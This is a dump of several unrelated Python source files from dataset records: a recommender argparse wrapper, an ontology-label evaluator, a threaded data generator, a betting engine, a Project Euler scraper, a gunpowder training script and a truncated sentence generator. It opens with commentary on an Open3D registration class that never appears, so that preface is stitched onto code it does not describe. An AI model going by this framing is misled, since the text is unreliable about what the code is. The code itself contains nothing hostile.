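The RegistrationObj record above threads one coarse-to-fine Open3D pipeline through instance state: voxel downsampling, normal estimation, FPFH features, global RANSAC, then local ICP refinement. Below is a minimal free-function sketch of that same flow, assuming the class defaults shown above (voxel size 10, mutual filtering on, edge-length check 0.9, distance modifier 1.5); the names pairwise_register and preprocess are illustrative and not part of the ZebReg source.

import open3d as o3d

def pairwise_register(source, target, voxel_size=10.0):
    # Downsample, estimate normals, and compute FPFH features for one cloud.
    def preprocess(pcd):
        down = pcd.voxel_down_sample(voxel_size)
        down.estimate_normals(
            o3d.geometry.KDTreeSearchParamHybrid(radius=voxel_size * 2, max_nn=30))
        fpfh = o3d.pipelines.registration.compute_fpfh_feature(
            down,
            o3d.geometry.KDTreeSearchParamHybrid(radius=voxel_size * 5, max_nn=100))
        return down, fpfh

    src, src_fpfh = preprocess(source)
    tgt, tgt_fpfh = preprocess(target)

    # Coarse global alignment from FPFH feature correspondences (RANSAC).
    ransac = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(
        src, tgt, src_fpfh, tgt_fpfh, True, voxel_size * 1.5,
        o3d.pipelines.registration.TransformationEstimationPointToPoint(False), 4,
        [o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),
         o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(voxel_size * 1.5)],
        o3d.pipelines.registration.RANSACConvergenceCriteria(4000000, 500))

    # Local point-to-plane ICP refinement seeded with the RANSAC transform.
    return o3d.pipelines.registration.registration_icp(
        src, tgt, voxel_size, ransac.transformation,
        o3d.pipelines.registration.TransformationEstimationPointToPlane())

The RegistrationResult returned here carries the same fitness, inlier_rmse, and correspondence_set fields that the class reads when reporting metrics and computing its MAE.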
\n\t\"\"\"\n\tdef __init__(self):\n\n\t\tself.get_default_params(None)\n\t\tself.args = None\n\t\tself.args_dict = None\n\n\t\treturn \n\n\tdef input_params(self):\n\n\t\tparser = argparse.ArgumentParser()\n\t\t# 0) GENERAL\n\t\tparser.add_argument('--device', type=str, default=self.default_params['mymodel']['device'], help=\"Type of device\")\n\n\t\t# 1) DATA \n\t\tparser.add_argument('--Nsongs', type=int, default=self.default_params['mymodel']['Nsongs'], help=\"Number of different songs\")\n\n\t\t# \t\t1.1) PCOUNTS\n\t\tparser.add_argument('--userset_name', type=str, default=self.default_params['mymetadata']['userset_name'], help=\"File name for playcounts data\")\n\t\tparser.add_argument('--userset_path', type=str, default=self.default_params['mymetadata']['userset_path'], help=\"File path for playcounts data\")\n\t\tparser.add_argument('--pc_split', type=float, default=self.default_params['mydataset']['pc_split'], help=\"pcounts percentage of val and test\")\n\n\t\t# \t\t1.2) METADATA\n\t\tparser.add_argument('--metadata_name', type=str, default=self.default_params['mymetadata']['metadata_name'], help=\"Name of the metadata file\")\n\t\tparser.add_argument('--metadata_path', type=str, default=self.default_params['mymetadata']['metadata_path'], help=\"File path for metadata\")\n\t\tparser.add_argument('--Nmeta_classes', type=int, default=self.default_params['miscellaneous']['Nmeta_classes'], help=\"Number of different metadata classes\")\n\n\t\t# \t\t1.3) POSTDATA (dataset for post calculations)\n\t\tparser.add_argument('--bias_top', type=int, default=self.default_params['mymetadata']['bias_top'], help=\"Minimum number of songs in user_topsongs to be taken in care\")\n\t\tparser.add_argument('--bias_normal', type=int, default=self.default_params['mymetadata']['bias_normal'], help=\"Minimum number of songs in user_normalsongs to be taken in care\")\n\n\t\t# \t\t1.4) DATALOADER\n\t\tparser.add_argument('--batch_size', type=int, default=self.default_params['miscellaneous']['batch_size'], help=\"Batch size in one iteration\")\n\t\tparser.add_argument('--num_workers', type=int, default=self.default_params['miscellaneous']['num_workers'], help=\"Number of workers\")\n\t\tparser.add_argument('--seed', type=int, default=self.default_params['mydataset']['seed'], help=\"Random seed for numpy and torch\")\n\n\n\t\t# 2) MODEL\n\t\tparser.add_argument('--idim', type=int, default=self.default_params['mymodel']['idim'], help=\"Dimension of the user input of song's indexes\")\n\t\tparser.add_argument('--param_path', type=str, default=self.default_params['mymodel']['param_path'], help=\"File path for models parameters\")\n\n\t\t# \t\t2.1) STRUCTURE\n\t\tparser.add_argument('--dim', nargs='+', type=int, default=self.default_params['mymodel']['dim'], help=\"Dimensions for hidden layers\")\n\t\tparser.add_argument('--mod', type=str, default=self.default_params['mymodel']['mod'], help=\"Name of the model\")\n\t\t# flow\n\t\tparser.add_argument('--bias', type=str, default=self.default_params['mymodel']['bias'], help=\"Bias for embedding [y/n]\")\n\t\tparser.add_argument('--embname', type=str, default=self.default_params['mymodel']['embname'], help=\"Embedding model file name (ex. 
models/emb200)\")\n\t\tparser.add_argument('--blocksN', type=int, default=self.default_params['mymodel']['blocksN'], help=\"Number of blocks in flow\")\n\t\tparser.add_argument('--reduction_emb', type=str, default=self.default_params['mymodel']['reduction_emb'], help=\"Reduction for embedding\")\n\n\n\t\t# 3) OPTIMIZER\n\t\t# \t\t3.1) OPTIMIZER PARAMS\n\t\tparser.add_argument('--lr', type=float, default=self.default_params['mymodel']['lr'], help=\"Learning rate\")\n\t\tparser.add_argument('--lr_factor', type=float, default=self.default_params['miscellaneous']['lr_factor'], help=\"Factor for LR if patience is exceeded\")\n\n\t\t# \t\t3.2) LOSS\n\t\tparser.add_argument('--loss', type=str, default=self.default_params['mymodel']['loss'], help=\"Name of the loss function\")\n\t\t# KLD\n\t\tparser.add_argument('--beta', type=float, default=self.default_params['mymodel']['beta'], help=\"Loss coeficient for KLD\")\n\t\tparser.add_argument('--betastart', type=int, default=self.default_params['mymodel']['betastart'], help=\"Number of the epoch in which the KLD is added\")\n\n\t\t# \t\t3.3) TRAINING\n\t\tparser.add_argument('--n_epochs', type=int, default=self.default_params['miscellaneous']['n_epochs'], help=\"Number of epoch in training (n_epochs = 0 ==> random baseline)\")\n\t\tparser.add_argument('--patience', type=int, default=self.default_params['miscellaneous']['patience'], help=\"Number of epoch while test loss is increasing\")\n\t\tparser.add_argument('--restarts', type=int, default=self.default_params['miscellaneous']['restarts'], help=\"Number of times patience is exceeded\")\n\n\n\t\t# 4) ACTIONS\n\t\t# \t\t4.1) TODO\n\t\tparser.add_argument('--TODO', nargs='+', type=str, default=self.default_params['miscellaneous']['TODO'], help=\"Actions to perform\")\n\t\tparser.add_argument('--train_model', type=str, default=self.default_params['miscellaneous']['train_model'], help=\"Part of the flow model to train\")\n\t\tparser.add_argument('--train_tun', type=str, default=self.default_params['miscellaneous']['train_tun'], help=\"Train model using train+tuning\")\n\n\t\t# 5) Z_DATA\n\t\t# \t\t5.1) CALCULATION PARAMS\n\t\tparser.add_argument('--z_type_zdata', nargs='+', type=str, default=self.default_params['z_data']['z_type_zdata'], help=\"z_data types to calculate ['inp', 'out']\")\n\t\tparser.add_argument('--z_data_name', type=str, default=self.default_params['miscellaneous']['z_data_name'], help=\"Full path for z_data\")\n\t\tparser.add_argument('--N_users', type=int, default=self.default_params['z_data']['N_users'], help=\"Number of users used in z_data calculations\")\n\t\tparser.add_argument('--Nclusters', type=int, default=self.default_params['z_data']['Nclusters'], help=\"Number of clusters used in z_data calculations\")\n\t\t# \t\t5.2) PLOTING PARAMS\n\t\tparser.add_argument('--partition', nargs='+', type=str, default=self.default_params['miscellaneous']['partition'], help=\"Plot z partition ('test', 'train', 'val')\")\n\t\tparser.add_argument('--tags_zdata', nargs='+', type=str, default=self.default_params['miscellaneous']['tags_zdata'], help=\"tags to plot\")\n\t\tparser.add_argument('--tags_separated_zdata', type=str, default=self.default_params['miscellaneous']['tags_separated_zdata'], help=\"tags in different plots [y/n]\")\n\t\tparser.add_argument('--topNtag', type=int, default=self.default_params['miscellaneous']['topNtag'], help=\"TopN tags for each cluster\")\n\n\n\t\t# 6) TUNNING\n\t\tparser.add_argument('--minNclass', type=int, 
default=self.default_params[\"miscellaneous\"]['minNclass'], help=\"Minim N for each class in to do post calculations\")\n\t\t# \t\t6.1) PARAMS\n\t\tparser.add_argument('--z_type_tun', nargs='+', type=str, default=self.default_params[\"myrecom\"]['z_type_tun'], help=\"z_data types to use in tunning ['inp', 'out']\")\n\t\tparser.add_argument('--recomtype', type=str, nargs='+', default=self.default_params[\"myrecom\"]['recomtype'], help=\"Type of recommendation used [all]\")\n\t\tparser.add_argument('--alpha', type=float, nargs='+', default=self.default_params[\"myrecom\"]['alpha'], help=\"Coeficient for tunning [z' = z+alpha*...] (2 for range)\")\n\t\tparser.add_argument('--reli', type=float, nargs='+', default=self.default_params[\"myrecom\"]['reli'], help=\"reli coeficient for NDCG ([1, reli, 0])\")\n\t\tparser.add_argument('--topN', type=int, default=self.default_params[\"myrecom\"]['topN'], help=\"Number of recommended songs\")\n\t\tparser.add_argument('--alphaN', type=int, default=self.default_params[\"myrecom\"]['alphaN'], help=\"Split alpha range in N elements\")\n\t\tparser.add_argument('--reliN', type=int, default=self.default_params[\"myrecom\"]['reliN'], help=\"Split reli range in N elements\")\n\t\tparser.add_argument('--tunpost_factor', type=float, default=self.default_params['miscellaneous']['tunpost_factor'], help=\"Relation between alpa for tunning and postfiltering for tun+post recomtype\")\n\t\tparser.add_argument('--alpha_post_sat', type=float, default=self.default_params['miscellaneous']['alpha_post_sat'], help=\"Value of alpha for NDCG postfiltering saturation\")\n\t\tparser.add_argument('--NDCG_post_sat', type=float, default=self.default_params['miscellaneous']['NDCG_post_sat'], help=\"Value of NDCG postfiltering saturation\")\n\n\n\t\t# 7) NDCG\n\t\tparser.add_argument('--legend_NDCG', type=str, default=self.default_params['miscellaneous']['legend_NDCG'], help=\"Plot legend in NDCG\")\n\t\tparser.add_argument('--class_ave_NDCG', type=str, default=self.default_params['miscellaneous']['class_ave_NDCG'], help=\"Plot class average of NDCG\")\n\n\n\t\targs = parser.parse_args()\n\n\t\t# TRANSLATE AND CHECKS\n\t\tif args.n_epochs == 0: args.loss = \"dummy\"\n\n\t\tif args.bias == \"n\": args.bias = False\n\t\telse: args.bias = True\n\n\t\tif args.legend_NDCG == \"y\": args.legend_NDCG = True\n\t\telse: args.legend_NDCG = False\n\n\t\tif args.alpha is not None:\n\t\t\tif len(args.alpha) == 1:\n\t\t\t\tpass\n\t\t\telif len(args.alpha) == 2:\n\t\t\t\targs.alpha = np.linspace(args.alpha[0], args.alpha[1], args.alphaN)\n\t\t\telse:\n\t\t\t\treturn None, \"ERROR (PARAM_WRAPPER.input_params): --alpha must have len=1 or 2\"\n\n\t\tif args.reli is not None:\n\t\t\tif len(args.reli) == 1:\n\t\t\t\tpass\n\t\t\telif len(args.reli) == 2:\n\t\t\t\targs.reli = np.linspace(args.reli[0], args.reli[1], args.reliN)\n\t\t\telse:\n\t\t\t\treturn None, \"ERROR (PARAM_WRAPPER.input_params): --reli must have len=1 or 2\"\n\n\t\tif args.mod==\"flow\" and args.embname is None: return None, \"ERROR (PARAM_WRAPPER.input_params): Specify name for flow projector (--embname)\"\n\n\t\tif args.z_type_tun == \"\" and args.recomtype != [\"postfiltering\"]: return \"ERROR (PARAM_WRAPPER.input_params): Specify a z_data type to be used in tunning\"\n\n\t\tif args.Nmeta_classes == -1:\n\t\t\tif args.metadata_name == \"opt_tags\": args.Nmeta_classes = 1000\n\t\t\tif args.metadata_name == \"opt_tags_filtered\": args.Nmeta_classes = 59\n\t\t\tif args.metadata_name == \"opt_genre\": args.Nmeta_classes = 21\n\n\t\tif 
args.train_tun == \"y\": args.train_tun = True\n\t\telse: args.train_tun = False\n\n\t\tself.args_dict = vars(args) # converts args.Namespace() to dict\n\t\tself.args = args\n\n\t\treturn args, None\n\n\tdef get_default_params(self, class_name):\n\n\t\tdefault_params = {}\n\t\tdefault_params[\"mymodel\"] = {\n\t\t\t\t'idim':100,\n\t\t\t\t'Nsongs':180198,\n\t\t\t\t'device':'cuda',\n\t\t\t\t'loss':None,\n\t\t\t\t'dim':None,\n\t\t\t\t'mod':None,\n\t\t\t\t'beta':None,\n\t\t\t\t'betastart':None,\n\t\t\t\t'bias':True,\n\t\t\t\t'embname':None,\n\t\t\t\t'blocksN':4,\n\t\t\t\t'hN':4,\n\t\t\t\t'reduction_emb':'attention',\n\t\t\t\t'lr':1E-3,\n\t\t\t\t'model_path':'main/models',\n\t\t\t\t'param_path':'results/models',\n\t\t\t\t'Nmeta_classes':-1\n\t\t}\n\t\tdefault_params[\"mymetadata\"] = {\n\t\t\t\t'userset_name':'opt_pcounts',\n\t\t\t\t'userset_path':'results/metadata',\n\t\t\t\t'metadata_name':'opt_tags',\n\t\t\t\t'metadata_path':'results/metadata',\n\t\t\t\t'metadata_type':'list',\n\t\t\t\t'postset_name':'postset_opt_tags',\n\t\t\t\t'postset_path':'results/metadata',\n\t\t\t\t'bias_top':10,\n\t\t\t\t'bias_normal':10,\n\t\t\t\t'z_data_path':'results/z_data'\n\t\t}\n\t\tdefault_params[\"mydataset\"] = {\n\t\t\t\t'pc_split':0.1, #playcounts split for test and val\n\t\t\t\t'bias_top':1,\n\t\t\t\t'bias_normal':1,\n\t\t\t\t'seed':0\n\t\t}\n\t\tdefault_params[\"training_loss\"] = {\n\t\t\t\t'plot_path':'results/loss',\n\t\t\t\t'mymodel':None\n\t\t}\n\t\tdefault_params[\"z_data\"] = {\n\t\t\t\t'mymodel':None,\n\t\t\t\t'mymetadata':None,\n\t\t\t\t'mydataset':None,\n\t\t\t\t'Nclusters':10,\n\t\t\t\t'N_users':-1,\n\t\t\t\t'z_type_zdata':['out'],\n\t\t\t\t'z_data_name':None\n\t\t}\n\t\tdefault_params[\"myrecom\"] = {\n\t\t\t\t'z_type_tun':['out'],\n\t\t\t\t'recomtype':[],\n\t\t\t\t'alpha':[1.],\n\t\t\t\t'reli':[0.5],\n\t\t\t\t'topN':1000,\n\t\t\t\t'alphaN':10,\n\t\t\t\t'reliN':10,\n\t\t\t\t'z_data_type':'z_cluster'\n\t\t}\n\t\tdefault_params[\"miscellaneous\"] = {\n\t\t\t\t'batch_size':128,\n\t\t\t\t'num_workers':4,\n\t\t\t\t'lr_factor':0.1,\n\t\t\t\t'n_epochs':999,\n\t\t\t\t'patience':10,\n\t\t\t\t'restarts':2,\n\t\t\t\t'TODO':[],\n\t\t\t\t'partition':['train'],\n\t\t\t\t'tags_zdata':[],\n\t\t\t\t'tags_separated_zdata':False,\n\t\t\t\t'legend_NDCG':True,\n\t\t\t\t'class_ave_NDCG':True,\n\t\t\t\t'z_data_name':None,\n\t\t\t\t'topNtag':100,\n\t\t\t\t'minNclass':1,\n\t\t\t\t'tunpost_factor':None,\n\t\t\t\t'alpha_post_sat':None,\n\t\t\t\t'NDCG_post_sat':None,\n\t\t\t\t'train_model':\"\",\n\t\t\t\t'Nmeta_classes':-1,\n\t\t\t\t'train_tun':\"y\"\n\t\t}\n\n\t\tself.default_params = default_params\n\n\t\tif class_name is None: return\n\t\telse: return self.default_params[class_name]\n\n\tdef get_params(self, class_name):\n\n\t\tparam_names = self.default_params[class_name].keys()\n\t\tclass_params = self.default_params[class_name].copy()\n\t\tfor i,j in self.args_dict.items():\n\t\t\tif i in param_names: class_params[i] = j\n\n\t\treturn class_params\n\n##############################################################################################################","repo_name":"MarcSerraPeralta/rec-NN","sub_path":"main/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":12837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579485421","text":"import pm_parser\nimport csv\n\nphe = {}\nwith open(\"ASDPTO.csv\",\"r\") as csvfile:\n reader=csv.reader(csvfile)\n for line in reader:\n label = line[1]\n if label == 'Preferred Label':\n 
continue\n label = label.lower()\n label = label.replace('-', '_')\n label = label.replace(' ', '_')\n phe[label] = '_asdpto'\n\n\nwith open(\"HP.csv\",\"r\") as csvfile:\n reader=csv.reader(csvfile)\n for line in reader:\n label = line[1]\n if label == 'Preferred Label':\n continue\n elif label[0:3] == 'HP_':\n continue\n label = label.lower()\n label = label.replace('-', '_')\n label = label.replace(' ', '_')\n if label in phe.keys():\n phe[label] += '_hp'\n else:\n phe[label] = '_hp'\n\nfilename = 'Autism_Pure_Testing.txt'\n\nwith open(filename, 'r') as file_to_read:\n while True:\n text_to_annotate = file_to_read.readline()\n pm_parser.evaluate(text_to_annotate, phe)\n","repo_name":"hsbEdin/Dissertation","sub_path":"Dissertation/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28891262561","text":"\nimport numpy as np\n\nfrom threading import Semaphore, Thread\nfrom time import sleep\nfrom random import choice, randint\nfrom pdb import set_trace as pause\n\nclass DataGenerator(object):\n\n\tdef __init__(\tself, data, process_data_item_func, xshape, yshape, \\\n\t\t\t\t\tdata_item_selector\t= choice, \t\\\n\t\t\t\t\tnthreads\t\t\t= 2,\t\t\\\n\t\t\t\t\tpool_size\t\t\t= 1000,\t\t\\\n\t\t\t\t\tmin_nsamples\t\t= 1,\t\t\\\n\t\t\t\t\tdtype \t\t\t\t= 'single' ):\n\n\t\tassert pool_size >= min_nsamples, \\\n\t\t\t'Min. samples must be equal or less than pool_size'\n\t\tassert min_nsamples > 0 and pool_size > 0, \\\n\t\t\t'Min. samples and pool size must be positive non-zero numbers'\n\n\t\tself._data = data\n\t\tself._process_data_item = process_data_item_func\n\t\tself._data_item_selector = data_item_selector\n\t\tself._xshape = xshape\n\t\tself._yshape = yshape\n\t\tself._nthreads = nthreads\n\t\tself._pool_size = pool_size\n\t\tself._min_nsamples = min_nsamples\n\t\tself._dtype = dtype\n\t\t\n\t\tself._count = 0\n\t\tself._stop = False\n\t\tself._threads = []\n\t\tself._sem = Semaphore()\n\n\t\tself._X, self._Y = self._get_buffers(self._pool_size)\n\n\n\tdef _get_buffers(self,N):\n\t\tX = np.empty((N,) + self._xshape, dtype=self._dtype)\n\t\tY = np.empty((N,) + self._yshape, dtype=self._dtype)\n\t\treturn X,Y\n\n\tdef _compute_sample(self):\n\t\td = self._data_item_selector(self._data)\n\t\treturn self._process_data_item(d)\n\n\tdef _insert_data(self,x,y):\n\n\t\tself._sem.acquire()\n\n\t\tif self._count < self._pool_size:\n\t\t\tself._X[self._count] = x\n\t\t\tself._Y[self._count] = y\n\t\t\tself._count += 1\n\t\telse:\n\t\t\tidx = randint(0,self._pool_size-1)\n\t\t\tself._X[idx] = x\n\t\t\tself._Y[idx] = y\n\n\t\tself._sem.release()\n\n\tdef _run(self):\n\t\twhile True:\n\t\t\tx,y = self._compute_sample()\n\t\t\tself._insert_data(x,y)\n\t\t\tif self._stop:\n\t\t\t\tbreak\n\n\tdef stop(self):\n\t\tself._stop = True\n\t\tfor thread in self._threads:\n\t\t\tthread.join()\n\n\tdef start(self):\n\t\tself._stop = False\n\t\tself._threads = [Thread(target=self._run) for n in range(self._nthreads)]\n\t\tfor thread in self._threads:\n\t\t\tthread.setDaemon(True)\n\t\t\tthread.start()\n\n\tdef get_batch(self,N):\n\n\t\t# Wait until the buffer was filled with the minimum\n\t\t# number of samples\n\t\twhile self._count < self._min_nsamples:\n\t\t\tsleep(.1)\n\n\t\tX,Y = self._get_buffers(N)\n\t\tself._sem.acquire()\n\t\tfor i in range(N):\n\t\t\tidx = randint(0,self._count-1)\n\t\t\tX[i] = self._X[idx]\n\t\t\tY[i] = 
self._Y[idx]\n\t\tself._sem.release()\n\t\treturn X,Y\n\n\n","repo_name":"sergiomsilva/alpr-unconstrained","sub_path":"src/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1667,"dataset":"github-code","pt":"37"} +{"seq_id":"21441619760","text":"from models import Contract, Bid\n\n\ndef resolve_bet(txn, bidder, outcome, price, amount, yes_dir):\n matching_bids = [b for b in outcome.bids if b.yes_bid != yes_dir and b.price >= 100 - price]\n matching_bids = list(sorted(matching_bids, key=lambda b: (-b.price, b.bid_id)))\n while matching_bids and amount:\n bid = matching_bids.pop(0)\n\n shares_matched = min(amount, bid.amount)\n amount -= shares_matched\n\n c1 = Contract(outcome=outcome, bidder=bidder, price=100 - bid.price, amount=shares_matched,\n yes_contract=yes_dir)\n c2 = Contract(outcome=outcome, bidder=bid.bidder, price=bid.price, amount=shares_matched,\n yes_contract=not yes_dir)\n if shares_matched == bid.amount:\n txn.delete(bid)\n else:\n bid.amount -= shares_matched\n txn.add(c1)\n txn.add(c2)\n if amount:\n existing = txn.query(Bid).filter_by(bidder=bidder, outcome=outcome, price=price, yes_bid=yes_dir).first()\n if existing:\n existing.amount += amount\n else:\n bid = Bid(outcome=outcome, bidder=bidder, price=price, amount=amount, yes_bid=yes_dir)\n txn.add(bid)\n","repo_name":"jsannemo/betomator","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15112356262","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\n\nclass Euler:\n def __init__(self):\n self._baseUrl = 'https://projecteuler.net'\n self._problemUrl = self._baseUrl + '/problem=%s'\n\n def _generateProblemUrl(self, number):\n if number == None or number == 0 or number == '0':\n return None\n\n return self._problemUrl % number\n\n def _getUrlContent(self, url):\n if url == None:\n return None\n\n r = requests.get(url)\n if r.status_code != requests.codes.ok:\n return None\n return r.content\n\n def _getProblemFromHtml(self, htmlContent):\n if htmlContent in [None, '']:\n return None\n\n soup = BeautifulSoup(htmlContent, 'html.parser')\n\n probNotAvail = soup.findAll(text=re.compile('Problem not accessible'))\n if len(probNotAvail) > 0:\n return None\n\n try:\n ps = soup.select(\"div p\")\n s = [p.getText().replace('\\n', '') for p in ps]\n s = ' '.join(s)\n except:\n return None\n\n s = s if s != '' else None\n\n return s\n\n def _getProblem(self, number=None):\n response = dict()\n response['url'] = None\n response['description'] = None\n url = self._generateProblemUrl(number)\n\n if url is None:\n return response\n\n response['url'] = url\n content = self._getUrlContent(url)\n if content is None:\n return response\n\n response['description'] = self._getProblemFromHtml(content)\n\n return response\n\n def problem(self, number=None):\n return self._getProblem(number=number)\n","repo_name":"naren-m/euler","sub_path":"euler/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74220015468","text":"from gunpowder import *\nfrom gunpowder.tensorflow import *\nfrom gunpowder.contrib import ZeroOutConstSections # , AddBoundaryDistance\nimport tensorflow as tf\nimport os\nimport math\nimport json\nimport logging\n\n\ndef 
train_until(\n max_iteration,\n cremi_dir,\n data_sources,\n input_shape,\n output_shape,\n loss_name,\n cache_size=10,\n num_workers=10,\n):\n ArrayKey(\"RAW\")\n ArrayKey(\"ALPHA_MASK\")\n ArrayKey(\"GT_LABELS\")\n ArrayKey(\"GT_MASK\")\n ArrayKey(\"TRAINING_MASK\")\n ArrayKey(\"GT_SCALE\")\n # ArrayKey('LOSS_GRADIENT')\n ArrayKey(\"PREDICTED_LABELS\")\n ArrayKey(\"PREDICTED_PROB\")\n\n data_providers = []\n if tf.train.latest_checkpoint(\".\"):\n trained_until = int(tf.train.latest_checkpoint(\".\").split(\"_\")[-1])\n print(\"Resuming training from\", trained_until)\n else:\n trained_until = 0\n print(\"Starting fresh training\")\n for sample in data_sources:\n print(sample)\n h5_source = Hdf5Source(\n os.path.join(cremi_dir, \"sample_\" + sample + \"_cleftsorig_float.hdf\"),\n datasets={\n ArrayKeys.RAW: \"volumes/raw\",\n ArrayKeys.GT_LABELS: \"volumes/labels/clefts\",\n ArrayKeys.GT_MASK: \"volumes/masks/groundtruth\",\n ArrayKeys.TRAINING_MASK: \"volumes/masks/validation\",\n },\n array_specs={\n ArrayKeys.GT_MASK: ArraySpec(interpolatable=False),\n ArrayKeys.TRAINING_MASK: ArraySpec(interpolatable=False),\n ArrayKeys.GT_LABELS: ArraySpec(interpolatable=False),\n },\n )\n data_providers.append(h5_source)\n\n # todo: dvid source\n\n with open(\"net_io_names.json\", \"r\") as f:\n net_io_names = json.load(f)\n\n voxel_size = Coordinate((40, 4, 4))\n input_size = Coordinate(input_shape) * voxel_size\n output_size = Coordinate(output_shape) * voxel_size\n # input_size = Coordinate((132,)*3) * voxel_size\n # output_size = Coordinate((44,)*3) * voxel_size\n\n # specifiy which Arrays should be requested for each batch\n request = BatchRequest()\n request.add(ArrayKeys.RAW, input_size)\n request.add(ArrayKeys.GT_LABELS, output_size)\n request.add(ArrayKeys.GT_MASK, output_size)\n request.add(ArrayKeys.TRAINING_MASK, output_size)\n request.add(ArrayKeys.GT_SCALE, output_size)\n request.add(ArrayKeys.PREDICTED_LABELS, output_size)\n request.add(ArrayKeys.PREDICTED_PROB, output_size)\n\n # create a tuple of data sources, one for each HDF file\n data_sources = tuple(\n provider\n + Normalize(ArrayKeys.RAW)\n + IntensityScaleShift( # ensures RAW is in float in [0, 1]\n ArrayKeys.TRAINING_MASK, -1, 1\n )\n +\n # zero-pad provided RAW and GT_MASK to be able to draw batches close to\n # the boundary of the available data\n # size more or less irrelevant as followed by Reject Node\n Pad(ArrayKeys.RAW, None)\n + Pad(ArrayKeys.GT_MASK, None)\n + Pad(ArrayKeys.TRAINING_MASK, None)\n + RandomLocation()\n + Reject( # chose a random location inside the provided arrays\n ArrayKeys.GT_MASK\n )\n + Reject( # reject batches wich do contain less than 50% labelled data\n ArrayKeys.TRAINING_MASK, min_masked=0.99\n )\n + Reject(ArrayKeys.GT_LABELS, min_masked=0.0, reject_probability=0.95)\n for provider in data_providers\n )\n\n snapshot_request = BatchRequest(\n {\n # ArrayKeys.LOSS_GRADIENT: request[ArrayKeys.GT_LABELS],\n ArrayKeys.PREDICTED_LABELS: request[ArrayKeys.GT_LABELS]\n }\n )\n\n artifact_source = (\n Hdf5Source(\n os.path.join(cremi_dir, \"sample_ABC_padded_20160501.defects.hdf\"),\n datasets={\n ArrayKeys.RAW: \"defect_sections/raw\",\n ArrayKeys.ALPHA_MASK: \"defect_sections/mask\",\n },\n array_specs={\n ArrayKeys.RAW: ArraySpec(voxel_size=(40, 4, 4)),\n ArrayKeys.ALPHA_MASK: ArraySpec(voxel_size=(40, 4, 4)),\n },\n )\n + RandomLocation(min_masked=0.05, mask=ArrayKeys.ALPHA_MASK)\n + Normalize(ArrayKeys.RAW)\n + IntensityAugment(ArrayKeys.RAW, 0.9, 1.1, -0.1, 0.1, z_section_wise=True)\n + 
ElasticAugment((4, 40, 40), (0, 2, 2), (0, math.pi / 2.0), subsample=8)\n + SimpleAugment(transpose_only=[1, 2])\n )\n\n train_pipeline = (\n data_sources\n + RandomProvider()\n + ElasticAugment(\n (4, 40, 40),\n (0.0, 2.0, 2.0),\n (0, math.pi / 2.0),\n prob_slip=0.05,\n prob_shift=0.05,\n max_misalign=10,\n subsample=8,\n )\n + SimpleAugment(transpose_only=[1, 2])\n + IntensityAugment(ArrayKeys.RAW, 0.9, 1.1, -0.1, 0.1, z_section_wise=True)\n + DefectAugment(\n ArrayKeys.RAW,\n prob_missing=0.03,\n prob_low_contrast=0.01,\n prob_artifact=0.03,\n artifact_source=artifact_source,\n artifacts=ArrayKeys.RAW,\n artifacts_mask=ArrayKeys.ALPHA_MASK,\n contrast_scale=0.5,\n )\n + IntensityScaleShift(ArrayKeys.RAW, 2, -1)\n + ZeroOutConstSections(ArrayKeys.RAW)\n + BalanceLabels(ArrayKeys.GT_LABELS, ArrayKeys.GT_SCALE, ArrayKeys.GT_MASK)\n + PreCache(cache_size=cache_size, num_workers=num_workers)\n + Train(\n \"unet\",\n optimizer=net_io_names[\"optimizer\"],\n loss=net_io_names[loss_name],\n inputs={\n net_io_names[\"raw\"]: ArrayKeys.RAW,\n net_io_names[\"gt_labels\"]: ArrayKeys.GT_LABELS,\n net_io_names[\"loss_weights\"]: ArrayKeys.GT_SCALE,\n net_io_names[\"mask\"]: ArrayKeys.GT_MASK,\n },\n summary=net_io_names[\"summary\"],\n log_dir=\"log\",\n outputs={\n net_io_names[\"probabilities\"]: ArrayKeys.PREDICTED_PROB,\n net_io_names[\"predictions\"]: ArrayKeys.PREDICTED_LABELS,\n },\n gradients={},\n )\n + Snapshot(\n {\n ArrayKeys.RAW: \"volumes/raw\",\n ArrayKeys.GT_LABELS: \"volumes/labels/gt_clefts\",\n ArrayKeys.PREDICTED_LABELS: \"volumes/labels/pred_clefts\",\n ArrayKeys.PREDICTED_PROB: \"volumes/labels/pred_prob\",\n },\n every=500,\n output_filename=\"batch_{iteration}.hdf\",\n output_dir=\"snapshots/\",\n additional_request=snapshot_request,\n )\n + PrintProfilingStats(every=50)\n )\n\n print(\"Starting training...\")\n with build(train_pipeline) as b:\n for i in range(max_iteration):\n b.request_batch(request)\n\n print(\"Training finished\")\n\n\n# if __name__ == \"__main__\":\n# logging.basicConfig(level=logging.INFO)\n# data_sources = [\"A\", \"B\", \"C\"]\n# input_shape = (43, 430, 430)\n# output_shape = (23, 218, 218)\n# max_iteration = 400000\n# loss_name = \"loss_balanced_syn\"\n# train_until(max_iteration, \"/groups/saalfeld/saalfeldlab/larissa/data/cremi-2017/\", data_sources, input_shape,\n# output_shape, loss_name)\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/training/anisotropic/train_classification.py","file_name":"train_classification.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"73357969067","text":"import random\nimport click\nfrom dotmap import DotMap\nimport toml\n\n\nlanguage = DotMap()\n\n@click.command()\ndef main():\n global language\n language = DotMap(toml.load(\"./languages/pseudolatin.toml\"))\n parts = [ ]\n for _ in range(random.randint(1, 3)):\n parts.append(subject())\n parts.append(predicate())\n print(\" \".join(parts) + \".\")\n\ndef subject():\n global language\n words = [ ]\n include_adjective = random.choice([ True, 